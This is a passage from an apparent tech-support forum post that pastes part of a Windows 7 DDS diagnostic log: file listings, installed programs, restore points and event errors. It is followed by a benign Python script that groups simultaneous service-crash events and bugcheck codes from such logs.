2010-09-08 04:28:15 44544 ----a-w- C:\Windows\SysWow64\licmgr10.dll
2010-09-08 04:16:38 482816 ----a-w- C:\Windows\System32\html.iec
2010-09-08 03:22:31 386048 ----a-w- C:\Windows\SysWow64\html.iec
2010-09-08 02:48:16 1638912 ----a-w- C:\Windows\SysWow64\mshtml.tlb
2010-09-04 16:53:58 2931712 ----a-w- C:\Windows\SysWow64\x264vfw.dll
2010-08-21 06:29:47 558592 ----a-w- C:\Windows\System32\spoolsv.exe
2010-07-29 06:30:34 82944 ----a-w- C:\Windows\SysWow64\iccvid.dll
2006-05-03 09:06:54 163328 --sh--r- C:\Windows\SysWOW64\flvDX.dll
2007-02-21 10:47:16 31232 --sh--r- C:\Windows\SysWOW64\msfDX.dll
2008-03-16 12:30:52 216064 --sh--r- C:\Windows\SysWOW64\nbDX.dll
============= FINISH: 16:47:43.74 ===============
And here's Attach.txt
UNLESS SPECIFICALLY INSTRUCTED, DO NOT POST THIS LOG.
IF REQUESTED, ZIP IT UP & ATTACH IT
DDS (Ver_10-10-21.02)
Microsoft Windows 7 Ultimate
Boot Device: \Device\HarddiskVolume2
Install Date: 2/3/2010 10:31:33 PM
System Uptime: 10/18/2010 4:42:56 PM (0 hours ago)
Motherboard: | | N68PV-GS
Processor: AMD Athlon(tm) 64 X2 Dual Core Processor 5000+ | CPUSocket | 2600/200mhz
==== Disk Partitions =========================
C: is FIXED (NTFS) - 98 GiB total, 32.15 GiB free.
D: is CDROM ()
F: is FIXED (NTFS) - 135 GiB total, 23.529 GiB free.
G: is FIXED (NTFS) - 75 GiB total, 68.776 GiB free.
==== Disabled Device Manager Items =============
Class GUID: {36fc9e60-c465-11cf-8056-444553540000}
Description: Unknown Device
Device ID: USB\VID_0000&PID_0000\5&3225574&0&1
Manufacturer: (Standard USB Host Controller)
Name: Unknown Device
PNP Device ID: USB\VID_0000&PID_0000\5&3225574&0&1
Service:
Class GUID: {4d36e972-e325-11ce-bfc1-08002be10318}
Description: Microsoft ISATAP Adapter
Device ID: ROOT\*ISATAP\0000
Manufacturer: Microsoft
Name: Microsoft ISATAP Adapter
PNP Device ID: ROOT\*ISATAP\0000
Service: tunnel
Class GUID: {4d36e972-e325-11ce-bfc1-08002be10318}
Description: Microsoft Teredo Tunneling Adapter
Device ID: ROOT\*TEREDO\0000
Manufacturer: Microsoft
Name: Teredo Tunneling Pseudo-Interface
PNP Device ID: ROOT\*TEREDO\0000
Service: tunnel
Class GUID:
Description: Coprocessor
Device ID: PCI\VEN_10DE&DEV_0543&SUBSYS_05431849&REV_A2\3&267A616A&0&0B
Manufacturer:
Name: Coprocessor
PNP Device ID: PCI\VEN_10DE&DEV_0543&SUBSYS_05431849&REV_A2\3&267A616A&0&0B
Service:
==== System Restore Points ===================
RP202: 10/15/2010 3:00:17 AM - Windows Update
RP203: 10/15/2010 1:41:43 PM - Windows Update
RP204: 10/15/2010 6:03:36 PM - Windows Update
RP205: 10/16/2010 4:15:35 PM - Removed Apple Application Support
RP206: 10/16/2010 4:17:39 PM - Removed Substation Alpha 4.08
RP207: 10/16/2010 4:52:47 PM - Configured PRODUCT_NAME
RP208: 10/16/2010 4:55:04 PM - Configured PRODUCT_NAME
RP209: 10/16/2010 4:59:15 PM - Removed PlayStation(R)Store.
RP210: 10/16/2010 5:00:54 PM - Removed iLike Sidebar
RP211: 10/16/2010 5:02:46 PM - Removed Times Reader
RP212: 10/16/2010 5:34:32 PM - Removed Ask Toolbar.
RP213: 10/16/2010 7:11:38 PM - Windows Update
RP214: 10/16/2010 7:15:07 PM - Windows Update
RP215: 10/17/2010 6:54:20 PM - Installed HiJackThis
==== Installed Programs ======================
µTorrent
Adobe AIR
Adobe Flash Player 10 ActiveX
Adobe Flash Player 10 Plugin
Adobe Reader 9.3.4
Adobe Shockwave Player 11.5
Advertising Center
ALWIL Software Security 4.8.1296.0
Any DVD Converter Professional 4.0.7
Any Video Converter Professional 3.0.7
avast! Antivirus
AviSynth 2.5
Browser Defender 2.0.6.15
Combined Community Codec Pack 2009-09-09
DivX Version Checker
DolbyFiles
FlashGet 3.5
HiJackThis
HijackThis 2.0.2
ImagXpress
Java Auto Updater
Java(TM) 6 Update 21
K-Lite Mega Codec Pack 6.4.4
LightScribe System Software
Magic ISO Maker v5.5 (build 0281)
Malwarebytes' Anti-Malware
Media Player Classic - Home Cinema v. 1.3.1249.0
Microsoft Office Professional Edition 2003
Microsoft Silverlight
Microsoft Visual C++ 2005 Redistributable
Microsoft Visual C++ 2008 ATL Update kb973924 - x86 9.0.30729.4148
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.30319
Microsoft_VC80_ATL_x86
Microsoft_VC80_CRT_x86
Microsoft_VC80_MFC_x86
Microsoft_VC80_MFCLOC_x86
Microsoft_VC90_ATL_x86
Microsoft_VC90_CRT_x86
Microsoft_VC90_MFC_x86
MiniCoder
Mozilla Firefox (3.6.12)
MSXML 4.0 SP2 (KB954430)
MSXML 4.0 SP2 (KB973688)
Nero ControlCenter
Nero Installer
neroxml
Orbit Downloader
Picasa 3
Realtek High Definition Audio Driver
Security Update for Microsoft .NET Framework 4 Client Profile (KB2160841)
Security Update for Microsoft .NET Framework 4 Extended (KB2416472)
Sofonica Folder Soldier 1.4
Spyware Doctor 7.0
SUPER © Version 2010.bld.38 (May 2, 2010)
Uniblue DriverScanner
Uniblue PowerSuite
Uniblue RegistryBooster
Uniblue SpeedUpMyPC
VC80CRTRedist - 8.0.50727.762
VLC media player 1.1.4
Windows Media Player Firefox Plugin
WinRAR archiver
Xilisoft DVD Copy Express
Xilisoft DVD Creator
Xilisoft Video Converter Ultimate 6
Xilisoft YouTube Video Converter
XviD4PSP 5.0
XviD4PSP 6.0
Yahoo! Messenger
Yahoo! Software Update
Yahoo! Toolbar
==== Event Viewer Messages From Past Week ========
10/18/2010 4:37:54 PM, Error: Disk [11] - The driver detected a controller error on \Device\Harddisk2\DR6.
10/18/2010 12:49:45 PM, Error: Service Control Manager [7032] - The Service Control Manager tried to take a corrective action (Restart the service) after the unexpected termination of the Windows Management Instrumentation service, but this action failed with the following error: An instance of the service is already running.
10/18/2010 12:47:45 PM, Error: Service Control Manager [7031] - The Windows Update service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 60000 milliseconds: Restart the service.
10/18/2010 12:47:45 PM, Error: Service Control Manager [7031] - The Windows Management Instrumentation service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 120000 milliseconds: Restart the service.
10/18/2010 12:47:45 PM, Error: Service Control Manager [7031] - The User Profile Service service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 120000 milliseconds: Restart the service.
10/18/2010 12:47:45 PM, Error: Service Control Manager [7031] - The Themes service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 60000 milliseconds: Restart the service.
10/18/2010 12:47:45 PM, Error: Service Control Manager [7031] - The Task Scheduler service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 60000 milliseconds: Restart the service.
10/18/2010 12:47:45 PM, Error: Service Control Manager [7031] - The System Event Notification Service service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 120000 milliseconds: Restart the service.
10/18/2010 12:47:45 PM, Error: Service Control Manager [7031] - The Shell Hardware Detection service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 60000 milliseconds: Restart the service.
10/18/2010 12:47:45 PM, Error: Service Control Manager [7031] - The Server service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 60000 milliseconds: Restart the service.
10/18/2010 12:47:45 PM, Error: Service Control Manager [7031] - The Multimedia Class Scheduler service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 120000 milliseconds: Restart the service.
10/18/2010 12:47:45 PM, Error: Service Control Manager [7031] - The IKE and AuthIP IPsec Keying Modules service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 120000 milliseconds: Restart the service.
10/18/2010 12:47:45 PM, Error: Service Control Manager [7031] - The Group Policy Client service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 120000 milliseconds: Restart the service.
10/18/2010 12:47:45 PM, Error: Service Control Manager [7031] - The Background Intelligent Transfer Service service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 60000 milliseconds: Restart the service.
10/18/2010 12:47:45 PM, Error: Service Control Manager [7031] - The Application Experience service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 60000 milliseconds: Restart the service.
10/18/2010 12:39:59 PM, Error: Microsoft-Windows-WER-SystemErrorReporting [1001] - The computer has rebooted from a bugcheck. The bugcheck was: 0x000000f4 (0x0000000000000003, 0xfffffa8004cbe040, 0xfffffa8004cbe320, 0xfffff800039cb5d0). A dump was saved in: C:\Windows\MEMORY.DMP. Report Id: 101810-21250-01.
10/18/2010 12:16:30 PM, Error: Service Control Manager [7034] - The PC Tools Security Service service terminated unexpectedly. It has done this 1 time(s).
10/18/2010 12:14:22 PM, Error: Microsoft-Windows-WMPNSS-Service [14332] - Service 'WMPNetworkSvc' did not start correctly because CoCreateInstance(CLSID_UPnPDeviceFinder) encountered error '0x80004005'. Verify that the UPnPHost service is running and that the UPnPHost component of Windows is installed properly.
10/18/2010 1:37:49 PM, Error: Microsoft-Windows-WER-SystemErrorReporting [1001] - The computer has rebooted from a bugcheck. The bugcheck was: 0x000000f4 (0x0000000000000003, 0xfffffa800685c060, 0xfffffa800685c340, 0xfffff800039d15d0). A dump was saved in: C:\Windows\MEMORY.DMP. Report Id: 101810-19921-01.
10/17/2010 9:43:07 PM, Error: Disk [11] - The driver detected a controller error on \Device\Harddisk2\DR7.
10/17/2010 4:51:02 PM, Error: Disk [11] - The driver detected a controller error on \Device\Harddisk2\DR87.
10/17/2010 12:19:58 PM, Error: Disk [11] - The driver detected a controller error on \Device\Harddisk2\DR67.
10/17/2010 1:00:17 AM, Error: Microsoft-Windows-Time-Service [34] - The time service has detected that the system time needs to be changed by 909494 seconds. The time service will not change the system time by more than 54000 seconds. Verify that your time and time zone are correct, and that the time source time.windows.com,0x9 (ntp.m|0x9|0.0.0.0:123->207.46.197.32:123) is working properly.
10/16/2010 7:13:46 PM, Error: Microsoft-Windows-WindowsUpdateClient [20] - Installation Failure: Windows failed to install the following update with error 0x80080005: Update for Windows 7 for x64-based Systems (KB2388210).
==== End Of File ===========================
I thank you and owe you for looking into this.
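Reading the Event Viewer section of a DDS log by hand is slow, and the interesting pattern in the log above is easy to miss: thirteen Service Control Manager 7031 events in the same second, which typically means one shared hosting process (a svchost.exe group) crashed rather than thirteen separate services failing, plus two 0xF4 bugchecks. As an added example that is not part of the original post or of the DDS tool, the Python script below parses lines in the format DDS prints, groups 7031/7034 "terminated unexpectedly" events by timestamp so such clusters stand out, and pulls the bugcheck codes. The embedded sample is a subset of lines copied verbatim from the log above; the cluster threshold and the small bugcheck-name table are this example's own assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# One DDS "Event Viewer Messages" line looks like:
#   10/18/2010 12:47:45 PM, Error: Service Control Manager [7031] - The Themes service terminated unexpectedly. ...
LINE_RE = re.compile(
    r"^(?P<ts>\d{1,2}/\d{1,2}/\d{4} \d{1,2}:\d{2}:\d{2} [AP]M), "
    r"(?P<level>\w+): (?P<source>.+?) \[(?P<eid>\d+)\] - (?P<msg>.*)$"
)
SVC_RE = re.compile(r"^The (?P<svc>.+?) service terminated unexpectedly")
BUGCHECK_RE = re.compile(r"The bugcheck was: (?P<code>0x[0-9A-Fa-f]{8})")

# Assumed lookup table for this example; only the code that appears in the log above is listed.
BUGCHECK_NAMES = {"0x000000f4": "CRITICAL_OBJECT_TERMINATION"}

# A subset of the Event Viewer lines copied from the DDS log above
# (raw string because the messages contain Windows paths with backslashes).
SAMPLE_LOG = r"""
10/18/2010 4:37:54 PM, Error: Disk [11] - The driver detected a controller error on \Device\Harddisk2\DR6.
10/18/2010 12:49:45 PM, Error: Service Control Manager [7032] - The Service Control Manager tried to take a corrective action (Restart the service) after the unexpected termination of the Windows Management Instrumentation service, but this action failed with the following error: An instance of the service is already running.
10/18/2010 12:47:45 PM, Error: Service Control Manager [7031] - The Windows Update service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 60000 milliseconds: Restart the service.
10/18/2010 12:47:45 PM, Error: Service Control Manager [7031] - The Windows Management Instrumentation service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 120000 milliseconds: Restart the service.
10/18/2010 12:47:45 PM, Error: Service Control Manager [7031] - The User Profile Service service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 120000 milliseconds: Restart the service.
10/18/2010 12:47:45 PM, Error: Service Control Manager [7031] - The Task Scheduler service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 60000 milliseconds: Restart the service.
10/18/2010 12:47:45 PM, Error: Service Control Manager [7031] - The Group Policy Client service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 120000 milliseconds: Restart the service.
10/18/2010 12:47:45 PM, Error: Service Control Manager [7031] - The Background Intelligent Transfer Service service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 60000 milliseconds: Restart the service.
10/18/2010 12:39:59 PM, Error: Microsoft-Windows-WER-SystemErrorReporting [1001] - The computer has rebooted from a bugcheck. The bugcheck was: 0x000000f4 (0x0000000000000003, 0xfffffa8004cbe040, 0xfffffa8004cbe320, 0xfffff800039cb5d0). A dump was saved in: C:\Windows\MEMORY.DMP. Report Id: 101810-21250-01.
10/18/2010 12:16:30 PM, Error: Service Control Manager [7034] - The PC Tools Security Service service terminated unexpectedly. It has done this 1 time(s).
10/18/2010 1:37:49 PM, Error: Microsoft-Windows-WER-SystemErrorReporting [1001] - The computer has rebooted from a bugcheck. The bugcheck was: 0x000000f4 (0x0000000000000003, 0xfffffa800685c060, 0xfffffa800685c340, 0xfffff800039d15d0). A dump was saved in: C:\Windows\MEMORY.DMP. Report Id: 101810-19921-01.
"""


def parse_line(line):
    """Parse one DDS event line into a dict, or return None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], "%m/%d/%Y %I:%M:%S %p")
    ev["eid"] = int(ev["eid"])
    return ev


def parse_log(text):
    return [ev for ev in (parse_line(line) for line in text.splitlines()) if ev]


def service_crash_clusters(events, min_services=3):
    """Group SCM 7031/7034 'terminated unexpectedly' events by exact timestamp.
    Several unrelated services dying in the same second is the signature of a
    single hosting process (typically a shared svchost.exe) going down."""
    by_ts = defaultdict(list)
    for ev in events:
        if ev["source"] == "Service Control Manager" and ev["eid"] in (7031, 7034):
            sm = SVC_RE.match(ev["msg"])
            if sm:
                by_ts[ev["ts"]].append(sm.group("svc"))
    return {
        ts.isoformat(sep=" "): sorted(svcs)
        for ts, svcs in sorted(by_ts.items())
        if len(svcs) >= min_services
    }


def bugchecks(events):
    """Return (timestamp, code, name) for every WER 1001 'rebooted from a bugcheck' event."""
    out = []
    for ev in events:
        if ev["eid"] == 1001 and "WER-SystemErrorReporting" in ev["source"]:
            bm = BUGCHECK_RE.search(ev["msg"])
            if bm:
                code = bm.group("code").lower()
                out.append((ev["ts"].isoformat(sep=" "), code, BUGCHECK_NAMES.get(code, "unknown")))
    return sorted(out)


def triage(text, min_services=3):
    events = parse_log(text)
    return {
        "events": len(events),
        "crash_clusters": service_crash_clusters(events, min_services),
        "bugchecks": bugchecks(events),
    }


if __name__ == "__main__":
    result = triage(SAMPLE_LOG)
    print(f"parsed {result['events']} events")
    for ts, svcs in result["crash_clusters"].items():
        print(f"{ts}: {len(svcs)} services died together -> {', '.join(svcs)}")
    for ts, code, name in result["bugchecks"]:
        print(f"{ts}: bugcheck {code} ({name})")
```

Run it as-is to see the summary for the embedded subset, or paste the whole Event Viewer section of a DDS log into `SAMPLE_LOG`. A cluster reported at one timestamp is a single crash to investigate (the memory dump named in the 1001 event is the place to look), not a list of separate service bugs.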